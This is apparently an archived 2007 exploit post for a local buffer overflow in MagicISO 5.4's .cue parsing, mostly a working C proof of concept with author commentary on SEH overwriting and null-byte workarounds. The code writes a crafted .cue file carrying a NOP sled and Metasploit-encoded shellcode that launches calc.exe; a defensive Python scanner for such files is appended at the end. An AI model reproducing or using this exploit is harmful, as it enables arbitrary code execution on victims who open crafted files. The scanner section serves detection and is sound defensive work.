2007-05-24 MagicISO <= 5.4 (build239) .cue File Local Buffer Overflow Exploit
Rated as : Moderate Risk

/*
-- poc/demo for magiciso exploit, found by n00b
-- by: v9@fakehalo.us

-- original email reply comments:

I actually looked into this when you posted this on milw0rm.  I was able
to get it to run arbitrary code, however it was so unreliable it wasn't
worth me posting... however, it was informative.

you have control of several registers, however it's eax and edx(not ecx)
that are most interesting... the next instructions that get called(and
fault magiciso) are:

MOV DWORD PTR DS:[EDX],EAX
MOV DWORD PTR DS:[EAX+4],EDX

...now, with that you can overwrite any 4byte area in memory with anything
you want.  the problem is you can't use null bytes(which is where the
shellcode and the current SEH handler is(non-PEB)) in this situation. (and
the 2nd MOV can trigger an exception, which you will want to overwrite the
handler of)

you can possibly use other methods, like you mentioned(although i didn't
try for this situation), but i chose to write SEH handler for that block
(if you trigger it with a bunch of x's it will show up right under it in
ollydbg)

step 1 for making the 0x00?????? (EDX) nullbyte:
you just so happen to overwrite this buffer with full
control until the end of the buffer.  so, when most (C) functions write to
a buffer they will cap it with an 0x00 on the end, i just used that.  so
the overflow has to be an EXACT size for that to work.

step 2 for making the 0x00?????? (EAX) nullbyte:
once i had control of where i was writing EAX to (EDX), i had to figure
out a way to make another nullbyte as that is where the shellcode was
located.  to do this i came up with overwriting the SEH handler off-by-one,
overwriting a single throw-away byte into another memory address(that would
never be used), and leaving the original null-byte that was already there.

the downside to this is there was nothing left to keep track of
where the shellcode was, ie a simple CALL reg wasn't possible as by the
time i gained control of EIP there was no trace of where i was...so it
became a blind guess, and memory gets pretty scattered...nevertheless, it
is exploitable, and i popped up several calc.exe's when testing :)

even if not reliable, i found it an interesting workaround for null-bytes.
carry on if you like, here's the code i was using to test(which is
functional, just not reliable):

*/

#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/types.h>
#include <sys/stat.h> /* mkdir() */

/* winXP SP2 home (24bit, the first byte(0x00) will not be used) */
#define DFL_EAX 0xfd3ddd
#define DFL_EDX 0x12fb37

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 */
/* Encoder=PexFnstenvSub http://metasploit.com */
static unsigned char x86_exec[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x23"
"\x75\xbf\x4a\x83\xeb\xfc\xe2\xf4\xdf\x9d\xfb\x4a\x23\x75\x34\x0f"
"\x1f\xfe\xc3\x4f\x5b\x74\x50\xc1\x6c\x6d\x34\x15\x03\x74\x54\x03"
"\xa8\x41\x34\x4b\xcd\x44\x7f\xd3\x8f\xf1\x7f\x3e\x24\xb4\x75\x47"
"\x22\xb7\x54\xbe\x18\x21\x9b\x4e\x56\x90\x34\x15\x07\x74\x54\x2c"
"\xa8\x79\xf4\xc1\x7c\x69\xbe\xa1\xa8\x69\x34\x4b\xc8\xfc\xe3\x6e"
"\x27\xb6\x8e\x8a\x47\xfe\xff\x7a\xa6\xb5\xc7\x46\xa8\x35\xb3\xc1"
"\x53\x69\x12\xc1\x4b\x7d\x54\x43\xa8\xf5\x0f\x4a\x23\x75\x34\x22"
"\x1f\x2a\x8e\xbc\x43\x23\x36\xb2\xa0\xb5\xc4\x1a\x4b\x0b\x67\xa8"
"\x50\x1d\x27\xb4\xa9\x7b\xe8\xb5\xc4\x16\xde\x26\x40\x5b\xda\x32"
"\x46\x75\xbf\x4a";

struct{
 unsigned int eax;
 unsigned int edx;
 char *file;
 char *dir;
}tbl;

/* lonely extern. */
extern char *optarg;

/* functions. */
unsigned char write_cue(char *,unsigned int,unsigned int);
void printe(char *,short);
void usage(char *);

/* start. */
int main(int argc,char **argv){
 signed int chr=0;
 char *ptr;

 printf("[*] magiciso[v5.4/build 0239]: buffer overflow exploit.\n"
 "[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n"
 "[*] found by: n00b\n\n");

 tbl.eax=DFL_EAX;
 tbl.edx=DFL_EDX;

 while((chr=getopt(argc,argv,"m:a:d:"))!=EOF){
  switch(chr){
   case 'm':
    if(!tbl.dir){
     if(!(ptr=rindex(optarg,'/')))
      ptr=optarg;
     else ptr++;
     if(!(tbl.dir=(char *)strdup(optarg)))
       printe("main(): allocating memory failed",1);
     if(!(tbl.file=(char *)malloc(strlen(ptr)+5)))
      printe("main(): allocating memory failed",1);
     sprintf(tbl.file,"%s.cue",ptr); 
    }
    break;
   case 'a':
    sscanf(optarg,"%x",&tbl.eax);
    break;
   case 'd':
    sscanf(optarg,"%x",&tbl.edx);
    break;
   default:
    usage(argv[0]);
    break;
  }
 }

 if(((tbl.eax&0xff000000)>>24))
  printe("EAX address isn't 24bit/3 bytes.",1);
 if(((tbl.edx&0xff000000)>>24))
  printe("EDX address isn't 24bit/3 bytes.",1);

 if(!tbl.file)usage(argv[0]);

 printf("[*] directory:\t\t\t%s\n",tbl.dir);
 printf("[*] filename:\t\t\t%s/%s\n",tbl.dir,tbl.file);
 printf("[*] EAX address:\t\t0x[00]%.6x\n",tbl.eax);
 printf("[*] EDX address:\t\t0x[00]%.6x\n\n",tbl.edx);

 if(mkdir(tbl.dir,0755))
  printe("failed to make directory.",1);
 if(chdir(tbl.dir))
  printe("failed to chdir to new directory.",1);

 if(write_cue(tbl.file,tbl.eax,tbl.edx))
  printe("failed to write to file.",1);

 exit(0);
}

/* write the .cue file. */
unsigned char write_cue(char *file,unsigned int eax,unsigned int edx){
 unsigned int i=0;
 unsigned int real_eax=eax-4;
 unsigned char filler='x';
 unsigned char nop=0x90;
 FILE *fs;
 if(!(fs=fopen(file, "wb")))return(1);

 /* the "C:" is to make the overflowed buffer a static size. */
 fprintf(fs,"FILE \"C:");
 for(i=0;i<1022;i++){
  fwrite(&filler,1,1,fs);
 }

 /* this is an unused byte, the off-by-one write that keeps */
 /* the original null-byte in the SEH handler making this written */
 /* to one byte above the SEH handler. (fills in EAX) */
 fwrite(&filler,1,1,fs);

 fwrite(&tbl.eax,3,1,fs);
 fwrite(&tbl.edx,3,1,fs);

 /* --- */
 /* overflown buffer stops here, putting a null-byte on */
 /* the end of the string to keep the null-byte for EDX */

 fprintf(fs,"\" BINARY\nTRACK 01 MODE1/2355\nINDEX 01 00:00:00\n");

 /* simply throwing the nops/shellcode into memory at the end of the file. */
 for(i=0;i<500;i++){
  fwrite(&nop,1,1,fs);
 }
 fwrite(&x86_exec,sizeof(x86_exec),1,fs);

 fclose(fs);
 return(0);
}

/* error! */
void printe(char *err,short e){
 printf("[!] %s\n",err);
 if(e)exit(1);
 return;
}

/* usage. */
void usage(char *progname){
 printf("syntax: %s [-ad] -m directory\n\n",progname);
 printf("  -m <dir>\tdirectory to make and output .cue to.\n");
 printf("  -a <addr>\tEAX address, will become the SEH handler"
 " (0x[00]%.6x)\n",tbl.eax);
 printf("  -d <addr>\tEDX address, points to where the SEH handler is"
 " (0x[00]%.6x)\n\n",tbl.edx);
 exit(0);
}
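The comments above describe exactly what the generated .cue looks like on disk: a quoted FILE path padded to an exact overflow length, a few raw address bytes inside that path, and a NOP run plus payload dumped after the last directive. Those are the features a defender can key on when triaging .cue files. The following Python scanner is an added example, not part of the original post or of MagicISO; the 260-byte path limit, the 16-byte NOP-run threshold and the directive list are assumptions chosen for triage, and the two sample files at the bottom are constructed (the "suspicious" one uses 'x' filler and plain 0x90 bytes in place of any real payload).

```python
"""Triage scanner for .cue sheets shaped like the PoC described above.

Added example (not from the original post). Flags: an oversized quoted FILE
path, non-printable bytes inside that path, a long run of 0x90 (NOP) bytes,
and trailing data that is not a cue-sheet directive. Thresholds and the
directive list are assumptions for triage, not values taken from the PoC.
"""
import re

MAX_FILE_PATH = 260   # assumption: Windows MAX_PATH; longer paths are suspicious
MIN_NOP_RUN = 16      # assumption: this many consecutive 0x90 bytes looks like a sled

# Directives a well-formed cue sheet may start a line with (assumed list).
KNOWN_DIRECTIVES = {
    "FILE", "TRACK", "INDEX", "REM", "TITLE", "PERFORMER", "SONGWRITER",
    "CATALOG", "CDTEXTFILE", "FLAGS", "ISRC", "PREGAP", "POSTGAP",
}

FILE_RE = re.compile(rb'^\s*FILE\s+"([^"]*)"', re.IGNORECASE)
NOP_RUN_RE = re.compile(rb"\x90{%d,}" % MIN_NOP_RUN)


def scan_cue(data: bytes) -> list:
    """Return a list of human-readable findings; an empty list means nothing odd."""
    findings = []
    for lineno, line in enumerate(data.split(b"\n"), 1):
        stripped = line.strip()
        if not stripped:
            continue
        m = FILE_RE.match(line)
        if m:
            path = m.group(1)
            if len(path) > MAX_FILE_PATH:
                findings.append(
                    f"line {lineno}: FILE path is {len(path)} bytes "
                    f"(limit {MAX_FILE_PATH}); overflow-sized")
            if any(b < 0x20 or b > 0x7E for b in path):
                findings.append(f"line {lineno}: FILE path contains non-printable bytes")
        # A line whose first token is not a directive is binary data appended
        # after the sheet proper (the PoC puts its NOPs and payload there).
        token = stripped.split(None, 1)[0].upper().decode("ascii", errors="replace")
        if token not in KNOWN_DIRECTIVES:
            findings.append(f"line {lineno}: not a cue directive: {stripped[:12]!r}")
    m = NOP_RUN_RE.search(data)
    if m:
        findings.append(
            f"offset {m.start()}: run of {len(m.group(0))} 0x90 bytes (NOP sled)")
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when scan_cue() reports at least one finding."""
    return bool(scan_cue(data))


# Constructed samples (not real files): a benign sheet, and one laid out like
# the PoC with 'x' filler, six junk address bytes and a bare NOP run.
BENIGN_CUE = (b'FILE "album.bin" BINARY\n'
              b'  TRACK 01 MODE1/2352\n'
              b'    INDEX 01 00:00:00\n')
SUSPICIOUS_CUE = (b'FILE "C:' + b"x" * 1023 + b"\x01\x02\x03\x04\x05\x06"
                  + b'" BINARY\nTRACK 01 MODE1/2352\nINDEX 01 00:00:00\n'
                  + b"\x90" * 500)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_CUE), ("suspicious", SUSPICIOUS_CUE)):
        print(name, "->", "SUSPICIOUS" if is_suspicious(sample) else "clean")
        for finding in scan_cue(sample):
            print("   ", finding)
```

Run it on a directory of .cue files by reading each one in binary mode and passing the bytes to `scan_cue()`; the line-oriented checks catch the exact-size FILE overflow the PoC relies on even when the appended payload is encoded, while the NOP-run check catches sleds regardless of what the sheet itself looks like. Treat the path limit as a tuning knob: legitimate sheets rarely exceed a few dozen bytes in a FILE path, so a much lower threshold is reasonable in practice.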
securitydot.net - 2007-05-24

Copyright 2007, SecurityDot